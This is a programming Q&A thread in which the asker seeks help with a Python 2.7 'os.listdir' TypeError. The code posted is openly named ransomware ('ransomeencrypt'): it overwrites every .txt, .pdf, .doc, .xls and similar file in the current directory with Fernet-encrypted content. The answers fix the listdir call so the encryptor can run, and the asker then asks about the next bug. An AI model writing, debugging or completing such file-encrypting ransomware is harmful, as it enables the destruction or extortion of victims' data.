# TypeError: listdir() takes exactly 1 argument (0 given)

Tags: python, python-2.7

when I execute this in my win10 I get this error.
But when I am using:

dirs = os.listdir(path)
for file in dirs:
print(file)

I can see all the files in dir, I need help!

error:     Raw_Files = os.listdir()
TypeError: listdir() takes exactly 1 argument (0 given)

```
def ransomeencrypt(file_name):
    Lock = Fernet (key)
    with open (file_name, 'rb') as file:
        data = file.read ( )
    protected = Lock.encrypt (data)
    with open (file_name, 'wb') as file:
        file.write (protected)


def ransomedecrypt(file_name):
    Unlock = Fernet (key)
    with open (file_name, 'rb') as file:
        data = file.read ( )
    decoded = Unlock.decrypt (data)
    with open (file_name, 'wb') as file:
        file.write (decoded)


Raw_Files = os.listdir()
Files = list()

for File in Raw_Files:
    if File.endswith('.txt', '.pdf', '.doc', '.docx', '.ppt', '.ppx', '.xls', '.xlsx'):
        Files.append (File)

function = ransomeencrypt

for File in Files:
    function (file)
```

Comment: Well, yes. In Python 2.7 you have to tell os.listdir() *which* directory to list. Non-ancient versions of Python default to the current directory.

Answer (score 1, accepted):

From [the documentation of `os.listdir`](https://docs.python.org/3/library/os.html#os.listdir), it reads:

> Changed in version 3.2: The path parameter became optional.

Since the `TypeError: listdir() takes exactly 1 argument (0 given)` error you're getting suggests that the parameter is **not** optional, you're probably running an old version of Python. Upgrading it should solve the issue.

Alternatively, you may supply `'.'` as the parameter like this.

```py
# ...
Raw_Files = os.listdir('.')
```

Comment: thanks but cryptography.fernet is compitable in python 2.7 and other solutions?

Comment: @JunaidSheik I've included an alternative solution in the answer, refresh your page to see it. Also, note that [`cryptography.fernet` is available on the latest version of cryptography (documentation)](https://cryptography.io/en/latest/fernet/), and is compatible with the latest versions of Python 3.

Comment: Now, I am getting an error function (file) name 'file' is not defined please help!

Comment: @JunaidSheik Instead of asking in the comments, open a separate question for the new problem.

Answer (score 0):

Here you are passing 0 arguments to os.listdir. But you should at least pass one argument and that argument should be the path which you want to access.
For eg:-

```
# Open a file
path = "d:\\tmp\\"
dirs = os.listdir( path )
```